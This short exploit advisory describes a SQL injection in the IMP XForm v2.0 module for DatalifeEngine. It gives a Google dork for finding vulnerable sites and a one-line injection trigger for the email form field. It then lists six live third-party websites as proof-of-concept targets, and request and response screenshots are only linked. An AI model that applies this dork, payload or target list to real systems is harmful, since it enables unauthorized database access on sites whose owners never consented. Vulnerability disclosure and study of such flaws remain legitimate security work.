The IMP XForm version 2.0 DatalifeEngine module suffers from a remote SQL injection vulnerability.
8cc5797d2b3c75cb09d1c36bd0f02b5f# Exploit Title: IMP XForm v2.0 DatalifeEngine Module SQL Injection
# Exploit Author: Hesam Bazvand
# Software Link: http://www.datalifeengine.ir/download/1396/IMP.XForm.v2.0.zip
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
# Dork : inurl:xform/1.html OR inurl:xform/2.html and etc...
# Email : [email protected]
Exploit : Insert '"1 In Email Form and Enjoy It :D
Request : https://i.imgur.com/6MjOoYF.jpg
Response : https://i.imgur.com/Pbsr5iq.jpg
POC Targets :
http://payamclub.ir/xform/1.html
http://p-it.ir/xform/1.html
http://www.dlestore.ir/xform/2.html
http://www.muslimstudents.ir/xform/2.html
http://bandarabadan10000.ir/xform/1.html
http://www.ghaem125.ir/xform/1.html